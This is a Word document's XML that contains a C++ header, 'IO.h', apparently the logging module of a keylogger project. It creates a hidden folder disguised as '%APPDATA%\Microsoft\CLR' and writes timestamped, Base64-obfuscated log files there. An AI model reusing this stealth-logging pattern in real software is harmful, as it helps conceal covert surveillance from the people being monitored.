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96"/>
          <w:szCs w:val="96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96"/>
          <w:szCs w:val="96"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">“IO.h” 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ind w:firstLine="321" w:firstLineChars="10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(Because of different format code may appear different)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#ifndef IO_H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#define IO_H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#include &lt;string&gt;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#include &lt;cstdlib&gt;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#include &lt;fstream&gt;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#include &lt;Windows.h&gt;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#include "Helper.h"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#include "Base64.h"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namespace IO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std::string GetOurPath(const bool append_separator = false) //checks if the backslash is needed at the end of our path, add if needed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std::string appdata_dir(getenv("APPDATA")); // finds AppData directory path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std::string full = appdata_dir + "\\Microsoft\\CLR";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return full + (append_separator ? "\\" : "");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bool MkOneDr(std::string path) // checks if directory already exists or not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return (bool)CreateDirectory(path.c_str(), NULL) || GetLastError() == ERROR_ALREADY_EXISTS;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bool MKDir(std::string path) // builds full legal file path for each subdirectory, runs loop until a full path is created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for (char &amp;c : path) // c takes every char of path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if (c == '\\')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c = '\0';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if (!MkOneDr(path))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return false;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c = '\\';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return true;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template &lt;class T&gt;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std::string WriteLog(const T &amp;t)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std::string path = GetOurPath(true);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Helper::DateTime dt; // use DateTime struct from Helper namespace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std::string name = dt.GetDateTimeString("_") + ".log";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try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std::ofstream file(path + name);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if (!file) return ""; // if file cannot be opened or used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std::ostringstream s;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 &lt;&lt; "[" &lt;&lt; dt.GetDateTimeString() &lt;&lt; "]" &lt;&lt; std::endl &lt;&lt; t &lt;&lt; std::endl;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std::string data = Base64::EncryptB64(s.str()); // encrypt using function from Base64 namespace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file &lt;&lt; data;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if (!file)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return "";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file.close();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return name;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catch(...)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return "";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#endif // IO_H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double" w:color="auto" w:sz="6" w:space="4"/>
        <w:bottom w:val="none" w:sz="0" w:space="0"/>
        <w:right w:val="double" w:color="auto" w:sz="6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9E2589"/>
    <w:rsid w:val="7C9E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2018-10-19T11:41:00Z</dcterms:created>
  <dc:creator>hp 1</dc:creator>
  <cp:lastModifiedBy>hp 1</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-19T11:45:04Z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